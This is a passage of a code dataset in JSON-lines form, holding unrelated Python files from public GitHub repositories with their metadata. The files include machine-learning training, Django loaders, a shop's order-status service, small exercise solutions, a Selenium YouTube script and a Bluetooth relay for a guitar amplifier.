\n\nINPUT_DIM = 7864320\nOUTPUT_DIM = 6291456 \n\n\n# Model \nmodel = tf.keras.Sequential([\n tf.keras.layers.Flatten(input_shape=(INPUT_DIM,)),\n tf.keras.layers.Dense(28, activation='relu'),\n tf.keras.layers.Dense(OUTPUT_DIM, activation='sigmoid')\n])\n\n# Training \nmodel.compile(optimizer='adam', loss='binary_crossentropy')\n\nmodel.fit(processed_train, fixed_train,\n epochs=250, \n batch_size=1,\n shuffle=True)\n\n# Testing \ndef dice_coef(y_true, y_pred, smooth=1):\n # adapted from \n # https://towardsdatascience.com/metrics-to-evaluate-your-semantic-segmentation-model-6bcb99639aa2\n intersection = K.sum(y_true * y_pred)\n union = K.sum(y_true) + K.sum(y_pred)\n dice = K.mean((2. * intersection + smooth)/(union + smooth))\n return dice\n\npredicted_imgs_batch = model.predict(processed_test_set) \n\nresults_total = 0\nfor i in range(len(predicted_imgs_batch)):\n result = dice_coef(fixed_test_batch[i], predicted_imgs_batch[i])\n results_total += float(result)\nprint(\"The average Dice score on the test set is: \", results_total/len(predicted_imgs_batch))\n\n","repo_name":"rosikand/canary-crest","sub_path":"learning-based/direct_model_tf.py","file_name":"direct_model_tf.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69804015554","text":"import os, sys, shutil, git, re, json, time, logging, subprocess, pathlib, hashlib\n\nfrom os.path import basename, isfile, isdir, splitext\n\nfrom gitload.models import PLTP, PL\n\nfrom pysrc.question import Question, ErrorPL\n\nfrom serverpl.settings import SANDBOX_URL, DIRREPO\n\nfrom django.conf import settings\nfrom django.core.files.storage import Storage\n\n\n\nclass NotChecked(Exception):\n pass\n\n\nclass PL_Loader():\n \"\"\"Handle the loading of a PL by checking its integrity and loading it into the database. \"\"\"\n def __init__(self, rel_path, repository):\n self.name = splitext(basename(rel_path))[0]\n self.rel_path = rel_path\n self.repository = repository\n self.sha1 = self._get_sha1()\n self.root = DIRREPO+'/'+repository.name\n self.dic = None\n \n \n def load(self, pltp, force = False):\n \"\"\" Load the PL by checking its integrity and adding it to the database.\n Return (True, None) if the PL was correctly loaded, (False, error_message)\n if something wrong happened. \"\"\"\n try:\n q= Question(self.rel_path, self.root)\n self.dic = q.dico\n self.zipvalue = q.getZipValue()\n except ErrorPL as e:\n return False, \"Impossible de charger \"+self.rel_path+\": \"+str(e)\n \n self._add_to_db(pltp, force)\n \n return True, None\n \n def _get_sha1(self):\n \"\"\" Create a sha1 with the name of the PL and the name+version of the git containing it \"\"\"\n hasher = hashlib.sha1()\n hasher.update((self.name+self.repository.name).encode('utf-8'))\n return hasher.hexdigest()\n \n def _add_to_db(self, pltp, force):\n \"\"\" Add the PL to the database if none with the same sha1 already exists. \"\"\"\n try:\n pl = PL.objects.get(sha1=self.sha1)\n if force:\n pl.delete()\n raise PL.DoesNotExist\n except PL.DoesNotExist:\n pl = PL(name=self.name, sha1=self.sha1, json= self.dic, repository=self.repository, rel_path=self.rel_path)\n pl.save()\n pl.pltp.add(pltp)\n\n\n\nclass PLTP_Loader():\n \"\"\"Handle the loading of a PLTP by checking its integrity and its PL integrity and loading them into the database. \"\"\"\n def __init__(self, rel_path, repository):\n self.name = splitext(basename(rel_path))[0]\n self.rel_path = rel_path\n self.repository = repository\n self.sha1 = self._get_sha1()\n self.root = DIRREPO+'/'+repository.name\n self.url = \"/PlayExo/lti/\"+self.sha1\n self.dic = None\n self.pl = None\n \n def load(self, force=False):\n \"\"\" Load the PLTP by checking its integrity and adding it and every self.pl to the database.\n Return:\n - (sha1, None) if the PLTP was loaded\n - (None, error_msg) if PLTP couldn't be loaded\n - (None, None) if PLTP is already loaded\n \"\"\"\n try:\n self.dic = Question(self.rel_path, self.root).dico\n except ErrorPL as e:\n return None, \"Impossible de charger \"+self.rel_path+\": \"+e.message\n if not self._add_to_db(force):\n return None, None\n \n pltp = PLTP.objects.get(sha1=self.sha1)\n self.pl = self._get_pl_list()\n if (not self.pl):\n pltp.delete()\n return None, \"Erreur: Impossible de récuperer la liste des PL associés à \"+self.rel_path\n \n for pl in self.pl:\n loaded, error = pl.load(pltp, force)\n if (not loaded):\n pltp.delete()\n return None, error\n \n return self.sha1, None\n \n def _get_sha1(self):\n \"\"\" Create a sha1 with the name of the PLTP and the name+version of the git containing it \"\"\"\n hasher = hashlib.sha1()\n hasher.update((self.name+self.repository.name).encode('utf-8'))\n return hasher.hexdigest()\n \n def _get_pl_list(self):\n \"\"\" Return the list of every PL_Loader needed by this pltp \"\"\"\n pltp = open(self.root+self.rel_path, \"r\")\n pl_list = list()\n for line in pltp:\n if (line[0] == '@'):\n i=1\n while line[i]==' ':\n i=i+1\n filename=line[i:-1]\n pl_list.append(PL_Loader(filename, self.repository))\n pltp.close()\n return pl_list\n \n def _add_to_db(self, force):\n \"\"\" Try to add the PLTP to the database, return True if the PLTP was created, \n if force = False, return False if one with the same sha1 already exists, else load it anyway.\"\"\"\n\n try:\n existing = PLTP.objects.get(sha1=self.sha1)\n if (force):\n existing.delete()\n raise PLTP.DoesNotExist\n except PLTP.DoesNotExist:\n pltp = PLTP(name=self.name, url=self.url, sha1=self.sha1, json=self.dic, repository=self.repository, rel_path=self.rel_path)\n pltp.save()\n return True\n return False\n pass\n\n","repo_name":"plgitlogin/server-pl","sub_path":"gitload/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3611159808","text":"import json\nimport time\nimport requests\nfrom hashlib import sha256\n\nfrom flask_babel import gettext as _\n\nfrom app.helpers import log_info\nfrom app.helpers.date_time import current_timestamp\nfrom app.models.order import Order\n\n\nclass OrderStaticMethodsService(object):\n \"\"\" 订单静态方法Service \"\"\"\n\n @staticmethod\n def order_status_text_and_action_code(order):\n \"\"\" 获取订单状态和订单指令 \"\"\"\n status_text = u'' # 待付款 待发货 已发货 已取消 已完成\n action_code = [] # 订单指令列表: 1.发货; 2.取消订单;\n\n if order.order_status == 1:\n if order.pay_status == 1:\n status_text = _(u'待付款')\n action_code = [2]\n\n return (status_text, action_code)\n\n if order.pay_status == 2:\n if order.shipping_status == 1:\n status_text = _(u'待发货')\n action_code = [1]\n\n return (status_text, action_code)\n\n if order.shipping_status == 2 and order.deliver_status == 1:\n status_text = _(u'已发货')\n action_code = []\n\n return (status_text, action_code)\n\n if order.order_status == 2:\n status_text = _(u'已完成')\n action_code = []\n\n return (status_text, action_code)\n\n if order.order_status == 3:\n status_text = _(u'已取消')\n action_code = []\n\n return (status_text, action_code)\n\n if order.order_status == 4:\n if order.aftersale_status == 1:\n status_text = _(u'已退款')\n action_code = []\n\n return (status_text, action_code)\n\n if order.aftersale_status == 2:\n status_text = _(u'已换货')\n action_code = []\n\n return (status_text, action_code)\n\n if order.aftersale_status == 3:\n status_text = _(u'已退款,已换货')\n action_code = []\n\n return (status_text, action_code)\n\n return (status_text, action_code)\n \n\n @staticmethod\n def track(com, code):\n \"\"\"查询物流\"\"\"\n\n # 查询\n data = {'type':com, 'postid':code, 'id':1, 'valicode':'', 'temp':'0.49738534969422676'}\n url = 'https://m.kuaidi100.com/query'\n res = requests.post(url, data=data)\n res.encoding = 'utf8'\n\n # 检查 - 获取验证信息\n if res.status_code != 200:\n return (_(u'查询失败'), [])\n\n data = res.json()\n if data['message'] != 'ok':\n return (_(u'查询失败'), [])\n\n return ('ok', data['data'])\n\n\n @staticmethod\n def order_status_text(order):\n \"\"\"获取订单状态文本\"\"\"\n return OrderStaticMethodsService.order_status_text_and_action_code(order)[0]\n\n\n @staticmethod\n def goods_list_text(goods_data):\n \"\"\"获取商品列表数据转成text文本\"\"\"\n goods_list = []\n try:\n goods_list = json.loads(goods_data)\n except Exception as identifier:\n pass\n\n lst = []\n for goods in goods_list:\n item = u'%s x%d' % (goods.get('goods_name', ''), goods.get('quantity', 0))\n lst.append(item)\n return '\\n'.join(lst)\n\n \n @staticmethod\n def order_address_text(order_address):\n \"\"\"获取订单地址文本\"\"\"\n if not order_address:\n return ''\n\n return u'%s %s %s %s' % (order_address.province, order_address.city, \n order_address.district, order_address.address)\n","repo_name":"kapokcloud-inc/theonestore","sub_path":"app/services/admin/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"22006243363","text":"import sys; sys.stdin = open(\"2975.txt\", \"r\")\n\nwhile True:\n ip = list(input().split())\n if ip[0] == '0' and ip[1] == 'W' and ip[2] == '0':\n break\n else:\n if ip[1] == 'W':\n answer = int(ip[0]) - int(ip[2])\n else:\n answer = int(ip[0]) + int(ip[2])\n if answer >= -200:\n print(answer)\n else:\n print(\"Not allowed\")\n","repo_name":"vreez/APS","sub_path":"boj/boj_2975_Transactions.py","file_name":"boj_2975_Transactions.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38399504109","text":"import sys \nimport matplotlib.pyplot as plt \n\nt = []\nr = []\n\nwith open(sys.argv[1], 'r') as f:\n line = f.readline()\n is_t = True\n line_no = 1 \n while line:\n if(is_t):\n t.append(line)\n else:\n r.append(float(line))\n is_t = not is_t\n line = f.readline()\n line_no += 1 \n\n \nplt.scatter(t, r) \nplt.show()\n","repo_name":"MinhyukPark/Computers-Education-Research","sub_path":"python_scripts/ppm.py","file_name":"ppm.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1563547888","text":"import csv\n\ndef read_dictionary(filename, key_column_index = 0):\n \"\"\"Read the contents of a CSV file into a compound\n dictionary and return the dictionary.\n\n Parameters\n filename: the name of the CSV file to read.\n key_column_index: the index of the column\n to use as the keys in the dictionary.\n Return: a compound dictionary that contains\n the contents of the CSV file.\n \"\"\"\n students = {}\n\n with open(filename, \"rt\") as csv_file:\n reader = csv.reader(csv_file)\n next(reader)\n\n for line in reader:\n stud_key = line[key_column_index]\n students[stud_key] = line[1]\n\n return students\n\ndef main():\n stud = read_dictionary(\"students.csv\")\n \n s = input(\"Please enter an I-Number (xxxxxxxxx): \")\n if s in stud:\n print(f\"{stud[s]}\")\n else:\n print(\"No such student\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"caiosabarros/byui-cse_111","sub_path":"students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5519846625","text":"import torch.nn as nn\nimport pytorch_lightning as pl\nimport torch\nimport numpy as np\nimport random\nfrom typing import List, Tuple\nfrom torch.utils.data import DataLoader, Dataset\nimport utils.kl_cpd as klcpd\n\n\ndef fix_seeds(seed):\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.cuda.manual_seed_all(seed)\n random.seed(seed)\n np.random.seed(seed)\n\n\nclass NetG(nn.Module):\n def __init__(self, args) -> None:\n\n super(NetG, self).__init__()\n self.RNN_hid_dim = args[\"RNN_hid_dim\"]\n self.emb_dim = args[\"emb_dim\"]\n self.relu = nn.ReLU()\n\n self.fc = nn.Linear(args[\"data_dim\"], self.emb_dim)\n self.rnn_enc_layer = nn.GRU(\n self.emb_dim,\n self.RNN_hid_dim,\n num_layers=args[\"num_layers\"],\n batch_first=True,\n )\n self.rnn_dec_layer = nn.GRU(\n self.emb_dim,\n self.RNN_hid_dim,\n num_layers=args[\"num_layers\"],\n batch_first=True,\n )\n self.fc_layer = nn.Linear(self.RNN_hid_dim, args[\"data_dim\"])\n\n def forward(self, X_p, X_f, noise) -> torch.Tensor:\n X_p = self.relu(self.fc(X_p))\n X_f = self.relu(self.fc(X_f))\n\n X_p_enc, h_t = self.rnn_enc_layer(X_p)\n X_f_shft = self.shft_right_one(X_f)\n hidden = h_t + noise\n Y_f, _ = self.rnn_dec_layer(X_f_shft, hidden)\n output = self.fc_layer(Y_f)\n return output\n\n def shft_right_one(self, X) -> torch.Tensor:\n X_shft = X.clone()\n X_shft[:, 0, :].data.fill_(0)\n X_shft[:, 1:, :] = X[:, :-1, :]\n return X_shft\n\n\nclass NetD(nn.Module):\n def __init__(self, args) -> None:\n super(NetD, self).__init__()\n self.RNN_hid_dim = args[\"RNN_hid_dim\"]\n self.emb_dim = args[\"emb_dim\"]\n\n self.fc1 = nn.Linear(args[\"data_dim\"], self.emb_dim)\n\n self.rnn_enc_layer = nn.GRU(\n self.emb_dim,\n self.RNN_hid_dim,\n num_layers=args[\"num_layers\"],\n batch_first=True,\n )\n self.rnn_dec_layer = nn.GRU(\n self.RNN_hid_dim,\n self.emb_dim,\n num_layers=args[\"num_layers\"],\n batch_first=True,\n )\n\n self.fc2 = nn.Linear(self.emb_dim, args[\"data_dim\"])\n self.relu = nn.ReLU()\n\n def forward(self, X) -> Tuple[torch.Tensor, torch.Tensor]:\n X = self.relu(self.fc1(X))\n X_enc, _ = self.rnn_enc_layer(X)\n X_dec, _ = self.rnn_dec_layer(X_enc)\n X_dec = self.relu(self.fc2(X_dec))\n return X_enc, X_dec\n\n\nclass NetE(nn.Module):\n def __init__(self, args) -> None:\n super(NetE, self).__init__()\n self.conv1 = nn.Conv2d(\n in_channels=args[\"in_channels\"],\n out_channels=12,#12\n kernel_size=5,\n stride=2,\n dilation=2,\n )\n self.conv2 = nn.Conv2d(#12, 6, 3\n in_channels=12, out_channels=6, kernel_size=3, stride=2, dilation=2\n )\n self.maxpool = nn.MaxPool2d(3)\n self.flatten = nn.Flatten()\n\n def forward(self, X) -> torch.Tensor:\n output = []\n for frame_num in range(X.shape[-3]):\n x = nn.ReLU()(self.conv1(X[:, :, frame_num, :, :]))\n x = self.maxpool(nn.ReLU()(self.conv2(x)))\n x = self.flatten(x)\n output.append(x)\n return torch.stack(output, dim=2)\n\n\n#################################################################\nclass KLCPDVideo(pl.LightningModule):\n def __init__(\n self,\n netG: nn.Module,\n netD: nn.Module,\n args: dict,\n train_dataset: Dataset,\n test_dataset: Dataset,\n num_workers: int = 2,\n extractor: nn.Module = None,\n ) -> None:\n\n super().__init__()\n self.args = args\n self.netG = netG\n self.netD = netD\n\n if extractor == None:\n # Feature extractor for video datasets\n self.extractor = torch.hub.load(\n \"facebookresearch/pytorchvideo:main\", \"x3d_m\", pretrained=True\n )\n self.extractor = nn.Sequential(*list(self.extractor.blocks[:5]))\n else:\n self.extractor = extractor\n\n self.train_dataset = train_dataset\n self.test_dataset = test_dataset\n\n sigma_list = klcpd.median_heuristic(self.args[\"sqdist\"], beta=0.5)\n self.sigma_var = torch.FloatTensor(sigma_list)\n\n # to get predictions\n self.window_1 = self.args[\"window_1\"]\n self.window_2 = self.args[\"window_2\"]\n\n self.num_workers = num_workers\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n\n # X = batch[0].to(torch.float32)\n X = inputs[0].to(torch.float32)\n X_p, X_f = klcpd._history_future_separation(X, self.args[\"wnd_dim\"])\n\n X_p = self.extractor(X_p.float())\n X_f = self.extractor(X_f.float())\n\n X_p = X_p.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n X_f = X_f.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n\n X_p_enc, _ = self.netD(X_p)\n X_f_enc, _ = self.netD(X_f)\n\n Y_pred = klcpd.batch_mmd2_loss(X_p_enc, X_f_enc, self.sigma_var.to(self.device))\n\n return Y_pred\n\n # Alternating schedule for optimizer steps (e.g. GANs)\n def optimizer_step(\n self,\n epoch: int,\n batch_idx: int,\n optimizer: torch.optim.Optimizer,\n optimizer_idx: int,\n optimizer_closure,\n on_tpu: bool = False,\n using_native_amp: bool = False,\n using_lbfgs: bool = False,\n ):\n # update generator every CRITIC_ITERS steps\n if optimizer_idx == 0:\n if (batch_idx + 1) % self.args[\"CRITIC_ITERS\"] == 0:\n # the closure (which includes the `training_step`) will be executed by `optimizer.step`\n optimizer.step(closure=optimizer_closure)\n else:\n # call the closure by itself to run `training_step` + `backward` without an optimizer step\n optimizer_closure()\n\n # update discriminator every step\n if optimizer_idx == 1:\n for p in self.netD.rnn_enc_layer.parameters():\n p.data.clamp_(-self.args[\"weight_clip\"], self.args[\"weight_clip\"])\n optimizer.step(closure=optimizer_closure)\n\n def training_step(\n self, batch: torch.Tensor, batch_idx: int, optimizer_idx: int\n ) -> torch.Tensor:\n\n # optimize discriminator (netD)\n if optimizer_idx == 1:\n X = batch[0].to(torch.float32)\n X_p, X_f = klcpd._history_future_separation(X, self.args[\"wnd_dim\"])\n\n X_p = self.extractor(X_p.float())\n X_f = self.extractor(X_f.float())\n\n X_p = X_p.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n X_f = X_f.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n\n batch_size = X_p.size(0)\n\n # real data\n X_p_enc, X_p_dec = self.netD(X_p)\n X_f_enc, X_f_dec = self.netD(X_f)\n\n # fake data\n noise = torch.FloatTensor(1, batch_size, self.args[\"RNN_hid_dim\"]).normal_(\n 0, 1\n )\n noise.requires_grad = False\n noise = noise.to(self.device)\n\n Y_f = self.netG(X_p, X_f, noise)\n Y_f = self.netG(X_p, X_f, noise)\n Y_f_enc, Y_f_dec = self.netD(Y_f)\n\n lossD, mmd2_real = klcpd.mmdLossD(\n X_f,\n Y_f,\n X_f_enc,\n Y_f_enc,\n X_p_enc,\n X_f_dec,\n Y_f_dec,\n self.args[\"lambda_ae\"],\n self.args[\"lambda_real\"],\n self.sigma_var.to(self.device),\n )\n lossD = (-1) * lossD\n self.log(\"train_loss_D\", lossD, prog_bar=True)\n self.log(\"train_mmd2_real_D\", mmd2_real, prog_bar=True)\n\n # print('train loss D:', lossD)\n\n return lossD\n\n # optimize generator (netG)\n if optimizer_idx == 0:\n X = batch[0].to(torch.float32)\n X_p, X_f = klcpd._history_future_separation(X, self.args[\"wnd_dim\"])\n\n X_p = self.extractor(X_p.float())\n X_f = self.extractor(X_f.float())\n\n X_p = X_p.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n X_f = X_f.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n batch_size = X_p.size(0)\n\n # real data\n X_f_enc, X_f_dec = self.netD(X_f)\n\n # fake data\n noise = torch.FloatTensor(1, batch_size, self.args[\"RNN_hid_dim\"]).normal_(\n 0, 1\n )\n noise.requires_grad = False\n noise = noise.to(self.device)\n\n Y_f = self.netG(X_p, X_f, noise)\n Y_f_enc, Y_f_dec = self.netD(Y_f)\n\n # batchwise MMD2 loss between X_f and Y_f\n G_mmd2 = klcpd.batch_mmd2_loss(\n X_f_enc, Y_f_enc, self.sigma_var.to(self.device)\n )\n\n lossG = G_mmd2.mean()\n self.log(\"train_loss_G\", lossG, prog_bar=True)\n\n # print('train loss G:', lossG)\n\n return lossG\n\n def validation_step(self, batch: torch.Tensor, batch_idx: int) -> torch.Tensor:\n\n X = batch[0].to(torch.float32)\n X_p, X_f = klcpd._history_future_separation(X, self.args[\"wnd_dim\"])\n\n X_p = self.extractor(X_p.float())\n X_f = self.extractor(X_f.float())\n\n X_p = X_p.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n X_f = X_f.transpose(1, 2).flatten(2) # batch_size, timesteps, C*H*W\n\n X_p_enc, _ = self.netD(X_p)\n X_f_enc, _ = self.netD(X_f)\n\n val_mmd2_real = klcpd.batch_mmd2_loss(\n X_p_enc, X_f_enc, self.sigma_var.to(self.device)\n )\n\n self.log(\"val_mmd2_real_D\", val_mmd2_real, prog_bar=True)\n\n return val_mmd2_real\n\n def configure_optimizers(\n self,\n ) -> Tuple[torch.optim.Optimizer, torch.optim.Optimizer]:\n\n optimizerG = torch.optim.Adam(\n self.netG.parameters(),\n lr=self.args[\"lr\"],\n weight_decay=self.args[\"weight_decay\"],\n )\n\n optimizerD = torch.optim.Adam(\n self.netD.parameters(),\n lr=self.args[\"lr\"],\n weight_decay=self.args[\"weight_decay\"],\n )\n\n return optimizerG, optimizerD\n\n def train_dataloader(self):\n return DataLoader(\n self.train_dataset,\n batch_size=self.args[\"batch_size\"],\n shuffle=True,\n num_workers=self.num_workers,\n )\n\n def val_dataloader(self):\n return DataLoader(\n self.test_dataset,\n batch_size=self.args[\"batch_size\"],\n shuffle=False,\n num_workers=self.num_workers,\n )\n\n def test_dataloader(self):\n return DataLoader(\n self.test_dataset,\n batch_size=self.args[\"batch_size\"],\n shuffle=False,\n num_workers=self.num_workers,\n )\n","repo_name":"romanenkova95/kl_cpd_for_video","sub_path":"utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26511350395","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\n\n\ndef play_video(title):\n title.replace(\" \", \"+\")\n chrome_driver_name = 'chromedriver'\n project_root = os.getcwd()\n driver_bin = os.path.join(project_root, chrome_driver_name)\n\n driver = webdriver.Chrome(executable_path=driver_bin)\n # driver = webdriver.Chrome()\n driver.maximize_window()\n\n wait = WebDriverWait(driver, 3)\n presence = EC.presence_of_element_located\n visible = EC.visibility_of_element_located\n\n # Navigate to url with video being appended to search_query\n driver.get(\"https://www.youtube.com/results?search_query=\" + 'the+box')\n\n # play the video\n wait.until(visible((By.ID, \"video-title\")))\n driver.find_element_by_id(\"video-title\").click()\n\n wait.until(visible((By.ID, \"info\")))\n info = driver.find_element_by_id(\"info\")\n info.send_keys('f')\n\n\nplay_video(\"the box\")\n","repo_name":"jhsu2/AlexaX","sub_path":"deez.py","file_name":"deez.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41569203672","text":"def CountingDNANucleotides(input_file):\r\n with open(input_file,\"r\") as input:\r\n DNA = input.read()\r\n Count_of_A = DNA.lower().count('a')\r\n Count_of_C = DNA.lower().count('c')\r\n Count_of_G = DNA.lower().count('g')\r\n Count_of_T = DNA.lower().count('t')\r\n return Count_of_A, Count_of_C , Count_of_G, Count_of_T\r\n\r\ninput_file_path = r'D:\\Personal\\Academics\\UTA\\3rd semester\\Bioinformatics\\Rosalind\\Q6\\rosalind_dna.txt'\r\ncounts = CountingDNANucleotides(input_file_path)\r\nprint(*counts)\r\n\r\n","repo_name":"NDK22/Bioinformatic","sub_path":"Rosalind/Q6/Counting DNA Nucleotides.py","file_name":"Counting DNA Nucleotides.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6591066493","text":"def digits(s):\n power=len(str(n))\n return power\nn=int(input(\"enter the number\"))\nsum1=0\ntemp=n\nif n<=100000:\n while temp!=0:\n r=temp%10\n r1=r**digits(n)\n sum1=sum1+r1\n temp=temp//10\n if(n==sum1):\n print(\"yes\")\n else:\n print(\"no\")\n \n \n\n \n\n \n \n","repo_name":"Sariga6/sariga","sub_path":"armstrong.py","file_name":"armstrong.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72855387393","text":"from django.utils import simplejson\nfrom dajaxice.decorators import dajaxice_register\nfrom Principal.models import *\nfrom django.core import serializers\nimport json\n\n\n@dajaxice_register\ndef get_locals(request):\n objetos= Local.objects.all().values_list('nombre', 'lan', 'lot', 'descripcion', 'direccion', 'tipoLocal')\n data=[]\n for local in objetos:\n data.append(local)\n return json.dumps(data)\n\n@dajaxice_register\ndef get_locals_filter(request, tipoLocal):\n if tipoLocal=='Todos':\n objetos= Local.objects.all().values_list('nombre', 'lan', 'lot', 'descripcion', 'direccion', 'tipoLocal')\n else:\n objetos=Local.objects.filter(tipoLocal=tipoLocal).values_list('nombre', 'lan', 'lot', 'descripcion', 'direccion', 'tipoLocal')\n\n data = []\n for local in objetos:\n data.append(local)\n return json.dumps(data)","repo_name":"camilortte/Recomendador","sub_path":"Principal/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44103770156","text":"#! /usr/bin/python\n# -*- coding:UTF-8 -*-\nimport sys\nfrom PyQt5.QtWidgets import (QWidget,QHBoxLayout,QLabel,QApplication)\nfrom PyQt5.QtGui import QPixmap\nclass Example(QWidget):\n\tdef __init__(self):\n\t\tsuper(Example,self).__init__()\n\t\tself.initUI()\n\tdef initUI(self):\n\t\t\n\t\thbox = QHBoxLayout(self)\n\t\tpixmap = QPixmap('redrock.png')\n\n\t\tlb1 = QLabel(self)\n\t\tlb1.setPixmap(pixmap)\n\n\t\thbox.addWidget(lb1)\n\t\tself.move(300,200)\n\t\tself.setWindowTitle('Red Rock')\n\t\t#self.move(300,150)\n\t\tself.show()\n\t \n\t\n\t\t\t\n \nif __name__== '__main__':\n\tapp = QApplication(sys.argv)\n\tex = Example()\n\tsys.exit(app.exec_())","repo_name":"zuoshoupai/code","sub_path":"PyQt5 Demo/demo_map.py","file_name":"demo_map.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9161079041","text":"# now this uses the keyboard module\n# python -m pip install keyboard\n\nimport keyboard\nimport time\nimport socket\nimport threading\nimport serial\nimport struct\nfrom SparkClass import *\n#import bluetooth\n\n\nBAUD = 1000000\n\n# Get from Serial and send to Spark\nclass ReceiverThread(threading.Thread):\n def __init__(self, my_ser, my_sock):\n threading.Thread.__init__(self)\n self.SparkSocket = my_sock\n self.AppSerial = my_ser\n self.data = b''\n \n def run(self):\n global stop_now\n \n while not stop_now:\n self.data = self.data+self.AppSerial.read(400)\n if self.data:\n if self.data[0] != 1:\n self.data= self.data[1:]\n elif self.data[-1] == 247: \n print (\">> %s >>\" % self.data.hex())\n cmd = self.data[20:22]\n if cmd.hex() == \"0201\":\n num = self.data[23:25]\n print(\"Skipping preset request: \",cmd.hex(), \" \", num.hex())\n else:\n self.SparkSocket.send(self.data)\n self.data=b''\n \n print(\"App -> Spark thread stopped\")\n\n\n# Get from Spark and send to serial \nclass SenderThread(threading.Thread):\n def __init__(self, my_ser, my_sock):\n threading.Thread.__init__(self)\n self.SparkSocket = my_sock\n self.AppSerial = my_ser\n self.data = b''\n \n def run(self):\n global stop_now\n \n s = self.SparkSocket.recv(1)\n while not stop_now:\n if s == b'\\x01':\n t = self.SparkSocket.recv(1)\n if t == b'\\xfe':\n self.data = s + t\n s = self.SparkSocket.recv(5)\n self.data = self.data + s\n leng = int(s[4])\n s = self.SparkSocket.recv(leng - 7)\n self.data += s\n print (\"<< %s <<\" % self.data.hex())\n self.AppSerial.write(self.data)\n else:\n s = t\n else:\n s = self.SparkSocket.recv(1)\n \n print(\"Spark -> App thread stopped\")\n \nclass IntercepterThread(threading.Thread):\n def __init__(self, my_ser, my_sock):\n threading.Thread.__init__(self)\n self.SparkSocket = my_sock\n self.AppSerial = my_ser\n self.data = b''\n self.sc = SparkMessage()\n \n def run(self):\n global stop_now\n \n while not stop_now:\n if keyboard.is_pressed('0'):\n pres = 0\n elif keyboard.is_pressed('1'):\n pres = 1\n elif keyboard.is_pressed('2'):\n pres = 2\n elif keyboard.is_pressed('3'):\n pres = 3\n else:\n pres = -1\n\n if keyboard.is_pressed('q'):\n stop_now = True\n \n if pres >=0: \n byts = self.sc.change_hardware_preset(pres)\n byts2 = byts[0][0:4] + b'\\x41\\xff' + byts[0][6:20]+b'\\x03'+byts[0][21:]\n\n print(\"Sending change to preset %d\" % pres)\n print(\"}} %s }}\" % byts[0].hex())\n \n self.SparkSocket.send(byts[0])\n\n print(\"{{ %s {{\" % byts2.hex())\n \n self.AppSerial.write(byts2)\n # now just wait a bit \n time.sleep(0.2)\n \n print(\"Inter thread stopped\")\n\ndef main():\n global stop_now\n stop_now = False\n \n sc = SparkMessage()\n pres = 0\n \n ser=serial.Serial(\"COM7\", BAUD, timeout=0)\n \n print (\"Connecting to Spark - 08:EB:ED:4E:47:07\")\n SERVER_PORT = 2\n# spark = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n spark = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)\n spark.connect((\"08:EB:ED:4E:47:07\", SERVER_PORT))\n print (\"Connected successfully\")\n\n sendThread = SenderThread(ser, spark)\n recvThread = ReceiverThread(ser, spark)\n interThread = IntercepterThread(ser, spark)\n \n sendThread.start()\n recvThread.start()\n interThread.start()\n \n sendThread.join()\n recvThread.join()\n interThread.join()\n\n print(\"Finished\")\n ser.close()\n spark.close()\n\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"paulhamsh/Spark-Intercepter","sub_path":"src/SparkSpoofer4.py","file_name":"SparkSpoofer4.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5611511128","text":"\"\"\"Purge Messages\nSyntax: .purge\"\"\"\n\nimport asyncio\nfrom datetime import datetime\n\nfrom pyrogram import Client, Filters\n\nfrom pyrobot import COMMAND_HAND_LER\n\n\n@Client.on_message(Filters.command(\"purge\", COMMAND_HAND_LER) & Filters.me)\nasync def purge(client, message):\n if message.reply_to_message:\n start_t = datetime.now()\n recvd_commands = message.text.split(\" 